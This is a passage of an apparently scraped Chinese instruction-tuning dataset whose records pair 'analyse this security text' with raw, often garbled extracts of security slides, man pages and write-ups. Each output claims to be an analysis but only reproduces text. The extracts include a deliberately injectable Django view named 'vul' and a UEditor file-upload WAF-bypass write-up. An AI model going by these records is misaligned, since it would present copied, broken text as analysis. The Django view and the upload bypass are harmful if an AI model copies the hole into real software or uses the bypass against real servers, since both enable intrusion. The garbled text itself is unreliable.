| 4726 | 删除用户 | | 4728 | 将成员添加到启用安全的全局组中 | | 4729 | 将成员从安全的全局组中移除 | | 4732 | 将成员添加到启用安全的本地组中 | | 4733 | 将成员从启用安全的本地组中移除 | | 4756 | 将成员添加到启用安全的通用组中 | | 4757 | 将成员从启用安全的通用组中移除 | | 4719 | 系统审计策略修改 | 每个成功登录的事件都会标记一个登录类型不同登录类型代表不同的方式 | 登录类型 | 描述 | 说明 | | :------- | ------------------------------- | ------------------------------------------------ | | 2 | 交互式登录Interactive | 用户在本地进行登录 | | 3 | 网络Network | 最常见的情况就是连接到共享文件夹或共享打印机时 | | 4 | 批处理Batch | 批处理为批处理程序保留 | | 5 | 服务Service | 服务启动服务登录 | | 7 | 解锁Unlock | 屏保解锁 | | 8 | 网络明文NetworkCleartext | 登录的密码在网络上是通过明文传输的如FTPIIS登录验证 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMacOS Big)Sur内核漏洞挖掘和利用 Bio 0 1 Twitter(@peterpan980927) 阿里安全潘多拉实验室 高级安全工程师 iOS/macOS 安全研究&开发 KCon 2019 PPT 放映员&乐透操作手 Agenda 0 2 1. Backgrounds 2. Some case studies 3. Mitigations overview & new features 4. Attack macOS Big Sur 5. Summary & Credit Backgrounds AppleOS Kernel 0 3 XNU: X is not Unix(Hybrid Kernel) 1. Mach->(micro kernel) 2. BSD 3. IOKit Mach Ports 0 4 Basic concepts 1. Communication channels for IPC 2. 32bit number in userspace 3. ipc_port struct in kernel space 4. Single receiver/One or Multiple Senders /osfmk/ipc/ipc_object.h struct ipc_port { struct ipc_object ip_object; struct ipc_mqueue ip_messages;  }; struct ipc_object { ipc_object_bits_t io_bits; ipc_object_refs_t io_references; lck_spin_t io_lock_data; }___attribute__((aligned(8))); Mach Ports 0 5 Basic concepts 1. Many kernel data objects are wrapped with mach ports 2. E.g: Tasks(tfp0)/Driver instance(C++ obj)/clock/file_glob /osfmk/kern/ipc_kobject.h #define IKOT_CLOCK 25 #define IKOT_IOKIT_CONNECT 29 #define IKOT_IOKIT_OBJECT 30 #define IKOT_VOUCHER 37  Mach Ports For IPC 0 6 Overview Apple Driver 0 7 IOKit part IOKit是一套基于C++子集构建的框架库工具和资源 支持设备的动态和自动配置即插即用 抢占式多任务对称多处理 不支持异常多重继承模版和RTTI KEXT是内核扩展包含Apple Driver Apple Driver 0 8 Why? 1. Kexts run inside kernel, some can even reachable within the sandbox 2. Kext deprecated in WWDC 2019 3. System Extension replacing third party kext: DriverKit NetworkExtensionEndpoint Security 4. Less developers, less attention Apple Driver 0 9 Attack Surface 1. ExternalMethod(driver independent) 2. Notification Port(CVE-2020-9768) 3. SharedMemory(TOCTOU) 4. clientClose(CVE-2018-4326) 5. setProperties(CVE-2016-1835) Etc Apple Driver 1 0 Attack Surface 1. ExternalMethod(driver independent) 2. Notification Port(CVE-2020-9768) 3. SharedMemory(TOCTOU) 4. clientClose(CVE-2018-4326) 5. setProperties(CVE-2016-1835) Etc Apple Driver 1 1 Attack Surface http://homes.sice.indiana.edu/luyixing/bib/CCS20-iDEA.pdf Case)studies Case Studies 1 2 CVE-2016-1825(bazad) Case Studies 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom django.http import HttpResponse, JsonResponse from django.db.models.functions import Trunc from django.db.models import Count from .models import WebLog def create_log(request): method = request.method url = request.build_absolute_uri() user_agent = request.META.get('HTTP_USER_AGENT') WebLog.objects.create( method=method, url=url, user_agent=user_agent ) def vul(request): create_log(request) date = request.GET.get('date', 'minute') objects = list(WebLog.objects.annotate(time=Trunc('created_time', date)).values('time').order_by('-time').annotate(count=Count('id'))) return JsonResponse(data=objects, safe=False)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego Philip Tully | Mike Raggo 1 #whoami 2 Philip Tully @phtully Principal Data Scientist at ZeroFOX PhD (KTH & University of Edinburgh) Machine Learning and Neural Nets Mike Raggo @datahiding CSO @802 Secure, 17 yrs Stego Research StegSpy DC12, Author Data Hiding NSA National Cryptologic Museum DC25: Community, Discovery and the Unintended Uses of Technology 3 2600: The Hacker Quarterly 4 Summer 1992 Summer 2017 25 years A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego The Evolution of Steganography 5 DIY Social Steganography Deep Neural Networks for Social Stego Data-Driven Red and Blue Teaming Wrap Up A Picture is Worth a Thousand Words, Literally: Deep Neural Networks for Social Stego The Evolution of Steganography 6 Covert Communication 7 . . . any communication channel that can be exploited by a process to transfer information in a manner that violates the system's security policy. Source: U.S. Department of Defense. Trusted Computer System Evaluation The Orange Book. Publication DoD 5200.28-STD. Washington: GPO 1985 WetStone Labs Collected Steganography Programs Since January 1999 Includes versions 8 Tools are simple, designed to exploit sense weaknesses Many copycats are born, with some new features, greater focus on JPEG embedding Methods become more resilient to statistical attacks Multimedia begins to evolve into a viable method New versions emerge of existing Alg. Steganographic file systems begin to emerge VOIP, RTP and UDP techniques emerge along with decoys to complicate detection and recovery Evolution of Methods Social Media Stego used in images and URLs with malware, CnC, and covert communications Evolution of Stego - Internet Era 9  Stego Apps Decoy Techniques (OpenPuff)  Stealth Alternate Data Streams (NT)  Weaponized CnC - Operation Shady RAT  Protocols - VOIP, RTP, UDP => WiFi StegoStuffing, Bluetooth (Hosmer/Raggo - Wall of She", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# GraphQL Injection > GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data. A GraphQL service is created by defining types and fields on those types, then providing functions for each field on each type ## Summary - [GraphQL injection](#graphql-injection) - [Summary](#summary) - [Tools](#tools) - [Enumeration](#enumeration) - [Common GraphQL endpoints](#common-graphql-endpoints) - [Identify an injection point](#identify-an-injection-point) - [Enumerate Database Schema via Introspection](#enumerate-database-schema-via-introspection) - [Enumerate Database Schema via Suggestions](#enumerate-database-schema-via-suggestions) - [Enumerate the types' definition](#enumerate-the-types-definition) - [List path to reach a type](#list-path-to-reach-a-type) - [Exploit](#exploit) - [Extract data](#extract-data) - [Extract data using edges/nodes](#extract-data-using-edgesnodes) - [Extract data using projections](#extract-data-using-projections) - [Use mutations](#use-mutations) - [GraphQL Batching Attacks](#graphql-batching-attacks) - [JSON list based batching](#json-list-based-batching) - [Query name based batching](#query-name-based-batching) - [Injections](#injections) - [NOSQL injection](#nosql-injection) - [SQL injection](#sql-injection) - [References](#references) ## Tools * [swisskyrepo/GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) - Scripting engine to interact with a graphql endpoint for pentesting purposes * [doyensec/graph-ql](https://github.com/doyensec/graph-ql/) - GraphQL Security Research Material * [doyensec/inql](https://github.com/doyensec/inql) - A Burp Extension for GraphQL Security Testing * [dee-see/graphql-path-enum](https://gitlab.com/dee-see/graphql-path-enum) - Lists the different ways of reaching a given type in a GraphQL schema * [andev-software/graphql-ide](https://github.com/andev-software/graphql-ide) - An extensive IDE for exploring GraphQL API's * [mchoji/clairvoyancex](https://github.com/mchoj", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPopping a Smart Gun DEF CON 25 plore@tuta.io What is a smart gun? Skyfall Why I care Armatix iP1: watch and pistol Normal operation 25 cm Heres a token Hey! *squeeze* 1 2 Good, now I can fire 3 4 (Demo of normal operation) Motivation: a good challenge Forum post on Armatix iP1 review, November 2015: So lets pop it three ways! Defeat proximity restriction Denial of service Fire without authorization Normal range 25 cm 916.5 MHz 5.35 kHz 5.35 kHz burst Burst Relay block diagram MCU nRF24 2.4 GHz 916.5 MHz MCU nRF24 BPF Driver 5.35 kHz 5.35 kHz 3 m 4 1 2 3 Relay devices (custom hardware) Pistol side Watch side nRF24 2.4 GHz xcvr 5.35 kHz tuned coil 5.35 kHz BPF & amp Coil driver PIC16F MCU Relay devices (custom hardware) Total cost: $20  Cost (each):  $5 nRF24 module  $2 PCB  $1 microcontroller  $2 other parts (Demo of relay attack) Latency of relay Pistol NFC start Slave NFC start 630 us overall latency Relay defense  Enforce very tight timing requirements  Dont use RF/NFC at all for proximity  This is a difficult problem  Applicable to many products/industries Denial of service  Scenario 1:  Adversary wants to prevent gun from being fired by authorized user  Scenario 2:  Parent wants backup kill-switch in house in case gun not locked up properly  Scenario 3:  Other device unintentionally interferes RF weaknesses 916.5 MHz 5.35 kHz Not necessarily intentional  900 MHz ISM band used by many products  Baby monitors  Wireless microphones  Wireless video game controllers  Wireless headphones  Utility telemetry systems  Cordless phones  EMC testing should catch these problems 900 MHz transceiver Slicer and Manchester coding 1 0 1 1 1 0 ? 1 Watch auth token to pistol Sync Constant data Dynamic data Constant data Dynamic data Checksum Test signal 300 us inactive 33 us active Test signal over watch signal Scenario 1: Interference > Signal Signal strength Time = interfering signal = watch signal Slicer level Slicer level set based on interference peaks Slicer level too high No", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1996 Andries Brouwer .\\\" This page is somewhat derived from a page that was .\\\" (c) 1980, 1989, 1991 The Regents of the University of California .\\\" and had been heavily modified by Rik Faith and myself. .\\\" .\\\" This is free documentation; you can redistribute it and/or .\\\" modify it under the terms of the GNU General Public License as .\\\" published by the Free Software Foundation; either version 2 of .\\\" the License, or (at your option) any later version. .\\\" .\\\" The GNU General Public License's references to \"object code\" .\\\" and \"executables\" are to be interpreted as the output of any .\\\" document formatting or typesetting system, including .\\\" intermediate and printed output. .\\\" .\\\" This manual is distributed in the hope that it will be useful, .\\\" but WITHOUT ANY WARRANTY; without even the implied warranty of .\\\" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the .\\\" GNU General Public License for more details. .\\\" .\\\" You should have received a copy of the GNU General Public .\\\" License along with this manual; if not, write to the Free .\\\" Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, .\\\" USA. .\\\" .TH UMOUNT 8 \"26 July 1997\" \"Linux 2.0\" \"Linux 程序员手册\" .SH \"NAME 名字\" umount \\- 卸载文件系统 .SH 总览 .BI \"umount [\\-hV]\" .LP .BI \"umount -a [\\-nrv] [\\-t \" vfstype ] .br .BI \"umount [\\-nrv] \" \"device \" | \" dir \" [...] .SH 描述 .B umount 可以卸除当前挂载在文件层次目录中的文件系统 文件系统形式可以是以它所在的目录的形式指定 也可以是以它所在的特殊设备的形式来指定 请注意当文件系统正处于使用状态时不能进行卸载操作 必须等工作完成后才能进行卸除例如如果在当前文件系统中 有打开的文件或某些进程正工作在该文件系统的某个目录下时 或者是它上面的一个交换文件正在使用 干涉的进程甚至可以是 .B umount 本身 - 它打开 libc而随后 libc 可能会打开本地文件 .B umount 命令的选项 .TP .B \\-V 打印版本信息并退出 .TP .B \\-h 显示帮助信息并退出 .TP .B \\-v 以冗长模式运行 .TP .B \\-n 在卸载后不将相应信息写入 .IR /etc/mtab 文件 .TP .B \\-r 如果卸载失败试图以只读方式进行重新挂载 .TP .B \\-a 卸载所有在 .I /etc/mtab 文件中描述的文件系统在 .B umount 版本或以后的版本中不会卸载 .I proc 文件系统 .TP .BI \\-t \" vfstype\" 只卸载指定类型的文件系统如果要一次指定多个文件系统 可以用逗号分隔如在指定文件系统前加 .B no 则可卸载除些文件系统以外的其它文件系统 .TP .B \\-f 强制卸载比如不可达的 NFS  此选项须在高于 2.1.116 的版本上使用 .SH \"环路设备\" 如果在 .IR /etc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### FTP相关介绍 `FTP` ( `File Transfer Protocol` 即文件传输协议)是 `TCP/IP` 协议组中的协议之一 `FTP` 协议包括两个组成部分其一为 `FTP` 服务器其二为 `FTP` 客户端其中 `FTP` 服务器用来存储文件用户可以使用 `FTP` 客户端通过 `FTP` 协议访问位于 `FTP` 服务器上的资源在开发网站的时候通常利用 `FTP` 协议把网页或程序传到 `Web` 服务器上此外由于 `FTP` 传输效率非常高在网络上传输大的文件时一般也采用该协议 默认情况下 `FTP` 协议使用 `TCP` 端口中的 `20` 和 `21` 这两个端口其中 `20` 用于传输数据 `21` 用于传输控制信息但是是否使用 `20` 作为传输数据的端口与 `FTP` 使用的传输模式有关如果采用主动模式那么数据传输端口就是 `20` 如果采用被动模式则具体最终使用哪个端口要服务器端和客户端协商决定", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing Authenticated Wireless Networks Dean Pierce Brandon Edwards Anthony Lineberry Introduction to Authenticated Networks An authenticated wireless network is a network which requires a username and password to go online. They are increasingly common, although the same security flaws exist now that existed when the technology first became available. NoCatAuth NoCatAuth is an open source wireless authentication system written in perl. Widely used  Schools  Coffee shops  Restaurants  Community Networks Login Process DHCP HTTP requests are redirected to and SSL encrypted login page. Once authenticated, the firewall sets a rule that allows data from your IP and MAC address to pass through the gateway. Bypassing Authentication Basically, all that you need to do to bypass the firewall rules is spoof the information of someone who is already authenticated. Three things need to be known  MAC of target  IP of target  Location of the gateway How the pickupline Works Creates a database  Gateway information  Target information Creates a thread in the background that sniffs for possible targets and attempts to identify the gateway. Once you have some targets, you can try spoofing them with the spoof command. If the spoofing is successful, you should be able to go on the internet as if you were authenticated. How to Use the Tool start  starts the background thread that gathers target information etc list  lists all targets gathered spoof  lets you select a target to spoof exit  exits the program Demonstration", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1\" 2\" 3\" 7\" 8\" 9\" 10\" 11\" 12\" This\"is\"how\"networks\"show\"up\"in\"your\"network\"list\"when\"searching\"for\"wifi\"networks\" on\"your\"device.\" 13\" When\"you\"join\"a\"network,\"this\"interacCon\"happens.\" 14\" 15\" 16\" KARMA\"aKacks\"do\"exactly\"the\"same\"thing\"as\"a\"normal\"associaCon,\"its\"just\"an\"evil\"AP\" instead\"of\"the\"actual\"AP\"doing\"it.\" 17\" 18\" 19\" 20\" This\"is\"why\"KARMA\"aKacks\"werent\"working\"well,\"we\"werent\"responding\"to\"the\" broadcast\"probes.\"\" 21\" 22\" 23\" In\"trying\"to\"figure\"out\"the\"issue,\"we\"went\"to\"the\"place\"we\"should\"always\"see\"probes,\" hidden\"networks.\"Hidden\"networks\"dont\"return\"the\"ESSID\"in\"response\"to\"broadcast\" probes.\" 24\" The\"AP\"only\"gives\"up\"its\"name\"if\"the\"device\"probes\"for\"it\"specifically\"(i.e.\"you\"must\" know\"the\"name\"already).\" 25\" 26\" This\"means\"that\"iOS\"devices\"are\"passively\"looking\"for\"beacons\"from\"hidden\"networks.\" Why\"not\"do\"that\"for\"all\"networks?\" 27\" 28\" 29\" 30\" 31\" Probe\"responses\"contain\"a\"flag\"indicaCng\"whether\"they\"are\"WEP,\"WPA/2\"PSK,\"WPA/2\" EAP\"etc.\"This\"is\"used\"as\"part\"of\"the\"uniqe\"match\"for\"PNL\"networks.\" 32\" 33\" This\"specific\"part\"is\"sCll\"under\"heavy\"tesCng\"at\"the\"Cme\"of\"wriCng.\" 34\" We\"dont\"have\"the\"creds.\"But,\"we\"can\"have\"our\"rogue\"AP\"act\"as\"a\"WPA/2\"network\"and\" send\"the\"first\"packet,\"and\"we\"capture\"the\"second.\"We\"dont\"have\"the\"right\"key,\"and\" cant\"generate\"the\"Temporal\"key,\"but\"we\"have\"anonce\"and\"snonce\"and\"a\"MIC\"from\" the\"client,\"so\"we\"can\"aKempt\"to\"brute\"the\"key\"unCl\"we\"can\"generate\"a\"MIC\"for\"the\" snonce\"that\"matches\"the\"clients.\"Josh\"Wrights\"coWPAKy\"tool\"first\"did\"this.\" 35\" With\"EAP,\"we\"have\"a\"similar\"problem,\"but\"if\"the\"client\"isnt\"validaCng\"correctly,\"we\" can\"MitM.\"EAP\"TLS\"is\"mutually\"authenCcated\"so\"we\"cant\"here\"(just\"included\"for\"a\" simpler\"decripCon).\" 36\" We\"can\"MitM\"PEAP\"and\"PEAPdlike\"EAPs\"most\"of\"the\"Cme.\"This\"is\"because\"most\" configuraCons\"dont\"validate\"the\"server\"cert,\"and\"even\"when\"they\"do,\"there\"is\"no\"CN\" name\"match,\"its\"purely\"on\"authority.\"A\"successful\"MitM\"gets\"up\"an\"MSCHAPv2\" challenge\"response\"(depending\"on\"setup).\"\" 37\" 38\" 39\" 40\" 41\" 42\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDetecting and Defending Against State-Actor Surveillance Introduction CONTENTS Introduction Goals and Intent Surveillance Catalog Leaks  Hardware  Software  Wifi  Cellular Conclusions Who is involved ! Those that spy. ! Those that get spied on. Why do Spies Spy? ! Information has value. Moral values: ! Protect people from harm ! Progress society Immoral values: ! Blackmail ! Profiteering Full Disclosure I loath tin foil hats and conspiracy theories. Story time! ! 2010, someone working on their car finds a GPS unit ! Law enforcement and FBI show up shortly after it is removed, asking for their device back. ! www.wired.com/2010/10/fbi-tracking-device/ Story time! ! 2010, someone working on their car finds a GPS unit ! Law enforcement and FBI show up shortly after it is removed, asking for their device back. ! www.wired.com/2010/10/fbi-tracking-device/ ! This is the only major story that discusses a tracking device being found. Story time! ! 2010, someone working on their car finds a GPS unit ! Law enforcement and FBI show up shortly after it is removed, asking for their device back. ! www.wired.com/2010/10/fbi-tracking-device/ ! This is the only major story that discusses a tracking device being found. ! No agency admits involvement What is the Surveillance Catalog? Surveillance Catalog leaks ! Der Spiegel and 30c3 in December 2013 ! Tons of details regarding how spying agencies are 'bugging' computers, cell phones and more. ! They do not credit a source. Introducing Surveillance Sam! Hardware Bugs Hardware Bugs Retro Reflectors RAGEMASTER LOUDAUTO TAWDRYYARD SURLYSPAWN Hardware Bugs RF Bug Detection Hardware Bugs RF Bug Detection Hardware Bugs Software Defined Radio RF Bug Detection Hardware Bugs Data Exfiltration COTTONMOUTH HOWLERMONKEY GINSU FIREWALK A device by any of these names  GODSURGE, JETPLOW  HEADWATER, HALLUXWATER  SCHOOLMONTANA, SIERRAMONTANA, STUCCOMONTANA  FEEDTROUGH, GOURMETTROUGH, SOUFFLETROUGH Just means hardware for persistent compromise Hardware B", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction Flight of the Bumblebee With bird eyes Taming of the camera Views from up-there Flight Demo A low cost spying quadrotor for global security applications using hacked digital cameras A. Gademer, C. Cheron, S. Monat, F. Mainfroy, L. Beaudoin ESIEA Paris / Universite Paris-Est (France) DEFCON 17 http://fauconnoir.esiea.fr www.esiea-recherche.eu A. Gademer, C. Cheron, S. Monat, F. Mainfroy, L. Beaudoin ESIEA Paris / Universite Paris-Est (France) A low cost spying quadrotor for global security applications using hacked digital cameras Introduction Flight of the Bumblebee With bird eyes Taming of the camera Views from up-there Flight Demo Warning We apologies, but this is a first draft of our presentation slides. Look up for the last version on DEFCONs and faucon noirs website : www.defcon.org http ://fauconnoir.esiea.fr www.esiea-recherche.eu Thanks for reading us, Faucon Noir team. A. Gademer, C. Cheron, S. Monat, F. Mainfroy, L. Beaudoin ESIEA Paris / Universite Paris-Est (France) A low cost spying quadrotor for global security applications using hacked digital cameras Introduction Flight of the Bumblebee With bird eyes Taming of the camera Views from up-there Flight Demo Summary 1 Introduction 2 Flight of the Bumblebee 3 With bird eyes 4 Taming of the camera 5 Views from up-there 6 Flight Demo A. Gademer, C. Cheron, S. Monat, F. Mainfroy, L. Beaudoin ESIEA Paris / Universite Paris-Est (France) A low cost spying quadrotor for global security applications using hacked digital cameras Introduction Flight of the Bumblebee With bird eyes Taming of the camera Views from up-there Flight Demo Summary 1 Introduction Who the heck are we ? A. Gademer, C. Cheron, S. Monat, F. Mainfroy, L. Beaudoin ESIEA Paris / Universite Paris-Est (France) A low cost spying quadrotor for global security applications using hacked digital cameras Introduction Flight of the Bumblebee With bird eyes Taming of the camera Views from up-there Flight Demo Who the heck are we ? Student team F", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\napache overview 0x00 twf.soapache 0x01 helloworld demo apacheapache apachehookexample 1 handler httpd.conf AddHandler example-handler .sum apache.sumr->handlerexample-handler handlerexample-handler 2 module AP_MODULE_DECLARE_DATA example_module = { STANDARD20_MODULE_STUFF, NULL, NULL, NULL, NULL, NULL, register_hooks /* Our hook registering function */ }; example_moduleregister_hooks register_hooks: static void register_hooks(apr_pool_t *pool) { /* Create a hook in the request handler, so we get called when a request arrives */ ap_hook_handler(example_handler, NULL, NULL, APR_HOOK_LAST); } register_hooks ap_hook_handler(example_handler, NULL, NULL, APR_HOOK_LAST); ap_hook_handler apacheapiap_*handlerexample_handler examplehandler example_handler static int example_handler(request_rec *r) { /* First off, we need to check if this is a call for the \"example-handler\" handler. * If it is, we accept it and do our things, if not, we simply return DECLINED, * and the server will try somewhere else. */ if (!r->handler || strcmp(r->handler, \"example-handler\")) return (DECLINED); //r->handlerexample /* Now that we are handling this request, we'll write out \"Hello, world!\" to the client. * To do so, we must first set the appropriate content type, followed by our output. */ example_handler AddHandler example-handler .sum example-handler 3 example 1. AddHandler example-handler .sum handler 2. register_hooks 3. register_hooksap_hook_handlerhandler 4. ap_hook_handlerexample_handler 5. example_handlerhandler 0x02 apache apache 1. httpd 2. 3. MPM ap_set_content_type(r, \"text/html\"); ap_rprintf(r, \"Hello, world!\"); /* Lastly, we must tell the server that we took care of this request and everything went fine. * We do so by simply returning the value OK to the server. */ return OK; } 4. apacheapachewritemd5apr 5. apr apache 1. 2. 3. apr 0x03 url demoap_hook_handlerapache 0x04 hook ap_hook 1. 2. insert_filterap_hook_handler 3. logger filter 0x05 filter filterfilter static void filter_ech", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFirst step in the quest for manufacturing cyber-resilient IoT devices Panasonic Corporation Jun Sato Chih-Hsiang HITCON 2020@TAIPEI About me 佐藤 淳 Jun Sato Past experience in system development and operation Joined Panasonic in 2019 and involved in IoT security CISSP, GCFA Background サイバーセキュリティ戦略本部 サイバーセキュリティ２０１９ 別添５ サイバーセキュリティ関連データ集 NICTER観測結果より https://www.nisc.go.jp/active/kihon/pdf/cs2019.pdf Number of Attacks Observed by NICTER Darknet Sensors Breakdown of Observed Attacks by NICTER Darknet Sensors (2018) Number of cyber attacks continue to increase About half of observed attacks targeting IoT devices No. Packets (ten billion) Other Attacks targeting IoT devices (Web Camera, Routers, etc.) Cybersecurity Research Institute - Cyber Security 2019 Appending 5 - Cyber Security Related Data - NICTER Observation Results Increasing attacks targeting IoT Sudden Increase in IoT Malware New trends in the world of IoT threats, Kaspersky Lab, September 18, 2018 https://securelist.com/new-trends-in-the-world-of-iot-threats/87991/ The number of IoT malware has more than tripled from 2017 in just the first half of 2018 https://www.securityweek.com/hide-%E2%80%98n-seek-botnet-targets-smart-homes https://www.ithome.com.tw/news/132271 https://arstechnica.com/information-technology/2018/05/hackers-infect-500000- consumer-routers-all-over-the-world-with-malware/?amp=1 https://www.securityweek.com/over-500000-iot-devices-vulnerable-mirai-botnet https://www.ithome.com.tw/news/123708 https://www.ithome.com.tw/news/129449 Number of IoT malware infections rising rapidly, with no end in sight IoT Malware Wreaking Havoc Infect Spread Cyber Attacks Infect, Spread and leverage for use in attacks Victims unknowingly become attackers IoT Malware Infections and Associated Damages Regulations by Government 2019 Order of the Ministry of Internal Affairs and Communications No. 12 Partial revision to Telecommunications Business Act and Act on the National Institute of Information and Communications", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n所有操作均在授权项目中进行 一天下午好兄弟发来一个 ueditor 环境存在.net 任意文件上传一起看下存在创某盾 waf 0x01 把所有常用办法都测试例如 uri 填充post 填充大并发参数混淆参数 fuzz 等等都测试 过后均失败 后 fuzz 其他扩展名发现 cerasmxshtml 可以上传其他 ashx 什么的拦截 其中 cer 创某盾禁止访问asmx 文件试了很多个文件访问均 500 报错谷歌后似乎是因为 要.net4.6 以上才默认支持 asmx不知道与 iis10 版本有没有关系 尝试 shtml exec 执行命令提示 包含文件报错谷歌说原因是读取的路径或者文件中含有中文此处暂时放下 打印环境变量成功由此知道了目标中间件是 iis10 和其它信息 到这里思路又卡住了花了很多时间回去继续 fuzz 参数等等 0x02 没招了找分析文章看这个漏洞的原理发现大部分文章都是抄 Ivan1ee 的文章并没讲的 很清楚只是复现下在讲下大概原理就没了于是下载了.net 版源码跟流程 /net/controller.ashx 这里实例化 CrawlerHandler 类跟进这个类 /net/App_Code/CrawlerHandler.cs 第一红色箭头判断了传入 url 访问后 response 头有无图片头这里如果我们把我们的站点所 有请求均加入图片头直接传入 aspx 一样可以下载原 poc:1.jpg?.aspx 只是用图片马方便绕 过图片头判断 第二红色箭头是漏洞代码所在由其处理最关键的 path其他抄文章的到这里就是一句话 说这个函数存在漏洞就没了为了搞清楚究竟路径是如何处理的跟进该函数 /net/App_Code/PathFormater.cs 这里两个红色箭头处才是漏洞根源invalidPattern.Replace 通过正则去除了路径中的部分特 殊字符将匹配的字符置空这里可以看到正则内共有[\\\\\\/\\:\\*\\?\\042\\<\\>\\|]这么多字符都 可以置空 第二个箭头到了 extention 处就是指定文件扩展名的GetExtension()这个函数是自带函数用 于获取最后的扩展名 以原 poc 为例子漏洞原理为 1.jpg?.aspx 到了 invalidPattern.Replace 处通过正则替换后成 为 1.jpg.aspx 后经过 GetExtension()得到扩展名 aspx 最后 return 处理后的路径及扩展名 经上面得知正则支持很多替换马上去试了结果还是拦截掉了 根据这个正则又 fuzz 了下还是拦截这时候快十二点了暂时又没了思路再看看代码什 么的又花了半个多小时之后突然想到既然 PathFormater 可以帮忙把特殊符号置空自 己直接通过特殊符号拼接 aspx 关键字不就能绕过了再去操作下 构造 poc已经成功用这个思路还有类似的 poc 可以绕过这里不再贴图 0x03 绕过 测试时猜测 waf 后端的规则的粒度应该控制到具体漏洞级别了针对不同漏洞有不同的规 则如把 uri 中的 action 删除就不会拦截这时候应该规则就匹配不到 ue 这个漏洞规则所 以不会拦截 优点细粒度的规则最大程度避免了对生产业务的干扰 缺点针对不同漏洞需要花很多精力根据漏洞代码做细致规则否则可能就像 ue 通过源码 中的代码逻辑构造不常见的利用方式就可完成绕过 总结从代码里面构造新的 poc 是一种快捷的思路 0x04 防御 针对正则表达式处增加对应的规则修补 Ref: https://forums.iis.net/t/1241946.aspx?Setting+up+IIS+10+for+ASMX+service https://www.freebuf.com/vuls/181814.html", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNew Techniques for Discovering Smart Device Vulnerabilities 小灰灰 / Xiaohuihui Baidu Security Lab Senior Security Researcher 30-May2019 2 Who am I Senior Security Researcher at Baidu Security Lab Research areas: IoT security / AI security / autopilot vehicle security Experienced hardware cracker Previously Responsible For:  BSRC, incident response, 0-day analysis  Baidu product security assessment  Baidu security monitoring system construction Traditional IoT Device Cracking Router Firmware download Binwalk unpacking Finding problematic bin(why?) IDA analysis, WEB script file analysis Vulnerability verification (real machine or QEMU test) Most of them seem to be Vulnerability Analysis Now  We have a lot more different IoT devices, not just routers Large manufacturers wont let you easily crack the devices:  Firmware is not available for download  Telnet, serial port, ADB are all closed  Theres no way to get started What do we do? ? ? The Structures Are Similar OS and Hardware Full Android and Linux versions, ARMv5/6/7/x86 processors, EMMC/EMCP/NAND memory Openwrt Linux with microkernel, ARM, MIPS processor, NAND/SPI Flash memory RTOS Linux that has real-time operating systems with microkernel, ESP Lexin, Arduino system-on-chip, AVR, STM32 series, SPI Flash memory Application Scenarios Smart Speakers, Smart Watches, Vending Machines, TV boxes, Smart TVs, Smart Billboards, Vehicle System Router, Mini Smart Speaker, Smart Camera Smart Lock, Smart Rice Coker, Smart Socket, Smart Lamp, Smart Bracelet Features More features, more memory space, great platform for developing apps, most of them carry a large screen Simple but have advanced features, large screen is not necessary/only small screen is needed Function is simple but can be controlled via network, analogue electronics are not feasible. Step 0: Teardown! Be clear about what to do and where to go  What are the chip solutions? What we can do?  What to do when we get stuck? Look for chip model information and datasheet ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH ACCESS 1 \"4 January 1998\" \"Kpathsea 3.3.1\" .\\\"===================================================================== .if n .ds MP MetaPost .if t .ds MP MetaPost .if n .ds MF Metafont .if t .ds MF M\\s-2ETAFONT\\s0 .if t .ds TX \\fRT\\\\h'-0.1667m'\\\\v'0.20v'E\\\\v'-0.20v'\\\\h'-0.125m'X\\fP .if n .ds TX TeX .ie t .ds OX \\fIT\\v'+0.25m'E\\v'-0.25m'X\\fP\\\" for troff .el .ds OX TeX\\\" for nroff .\\\" the same but obliqued .\\\" BX definition must follow TX so BX can use TX .if t .ds BX \\fRB\\s-2IB\\s0\\fP\\*(TX .if n .ds BX BibTeX .\\\" LX definition must follow TX so LX can use TX .if t .ds LX \\fRL\\\\h'-0.36m'\\\\v'-0.15v'\\s-2A\\s0\\\\h'-0.15m'\\\\v'0.15v'\\fP\\*(TX .if n .ds LX LaTeX .\\\"===================================================================== .SH NAME(名称) access \\- 确定文件是否可以存取访问 .SH SYNOPSIS(总览) .B access .I -mode .I file .\\\"===================================================================== .SH DESCRIPTION (描述) 